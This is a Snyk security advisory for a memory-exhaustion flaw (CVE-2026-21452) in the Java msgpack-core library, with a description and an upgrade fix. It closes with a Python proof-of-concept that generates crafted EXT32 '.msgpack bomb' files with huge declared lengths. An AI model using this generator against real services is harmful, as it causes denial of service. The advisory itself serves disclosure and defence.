Memory Allocation with Excessive Size Value Affecting org.msgpack:msgpack-core package, versions [0.7.0-M6,0.9.11)
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Memory Allocation with Excessive Size Value vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-JAVA-ORGMSGPACK-14857714
- published4 Jan 2026
- disclosed2 Jan 2026
- creditSarvesh Patil
Introduced: 2 Jan 2026
CVE-2026-21452 (opens in a new tab)How to fix?
Upgrade org.msgpack:msgpack-core to version 0.9.11 or higher.
Overview
Affected versions of this package are vulnerable to Memory Allocation with Excessive Size Value in the deserialization process of .msgpack files containing EXT32 objects. An attacker can exhaust system memory and cause service unavailability by submitting a specially crafted .msgpack file containing a small EXT32 object with a very large declared payload length.
PoC
import msgpack
import struct
import os
OUTPUT_DIR = "bombs"
os.makedirs(OUTPUT_DIR, exist_ok=True)
# EXT format: fixext / ext8 / ext16 / ext32
# ext32 allows attacker-controlled length (uint32)
length = 1
step = 10_000_000
while True:
try:
# EXT32: 0xC9 | length (4 bytes) | type (1 byte)
header = b'\xC9' + struct.pack(">I", length) + b'\x01'
payload = b'A' # actual data tiny
data = header + payload
fname = f"{OUTPUT_DIR}/ext_length_{length}.msgpack"
with open(fname, "wb") as f:
f.write(data)
print(f"[+] Generated EXT bomb with declared length={length}")
length += step
except Exception as e:
print("[!] Stopped:", e)
break